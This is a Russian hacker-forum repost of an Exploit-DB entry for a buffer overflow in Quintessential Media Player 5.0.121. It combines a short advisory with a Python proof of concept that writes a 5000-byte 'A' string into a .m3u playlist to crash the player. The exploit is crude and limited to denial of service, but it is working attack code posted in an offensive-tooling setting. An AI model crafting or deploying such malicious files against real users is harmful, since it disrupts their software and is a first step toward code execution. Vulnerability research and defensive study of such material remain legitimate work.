Exploit Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34428
Проверка EDB
  1. Пройдено
Автор
ABHISHEK LYALL
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-08-09
Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/42307/info

Quintessential Media Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Quintessential Media Player 5.0.121 is vulnerable; other versions may also be affected.

#Quintessential Player 5.0.121 .m3u Crash POC
#vulnerble application link http://www.quinnware.com/downloads.php
#tested on XP SP2/3
#author abhishek lyall - abhilyall[at]gmail[dot]com
#web::: http://aslitsecurity.com  Blog::: http://aslitsecurity.blogspot.com
#!/usr/bin/python

filename = "Quintessential.m3u"


junk = "\x41" * 5000

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()
 
Источник
www.exploit-db.com

Похожие темы